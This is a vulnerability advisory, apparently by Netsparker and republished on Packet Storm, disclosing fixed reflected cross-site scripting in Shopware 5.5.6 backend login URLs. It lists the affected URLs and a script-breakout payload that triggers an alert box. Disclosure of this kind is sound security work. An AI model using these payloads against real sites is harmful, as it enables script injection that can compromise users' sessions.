Shopware version 5.5.6 suffers from multiple cross site scripting vulnerabilities.
eb25c1077ef6a645db6b377e7b7a016595162543b874efa6accee2d46294a0ee*Information: *
Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in Shopware
Affected Software: Shopware
Affected Versions: 5.5.6
Homepage: https://en.shopware.com/
Vulnerability: Cross-site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-004
*Technical Details:*
URL : http://
{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>
Parameter Type : Query String
Parameter Name : Query Based
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>
URL : http://
{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login/load/?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>
Parameter Type : Query String
Parameter Name : Query Based
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>
Regards,
Daniel Bishtawi
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed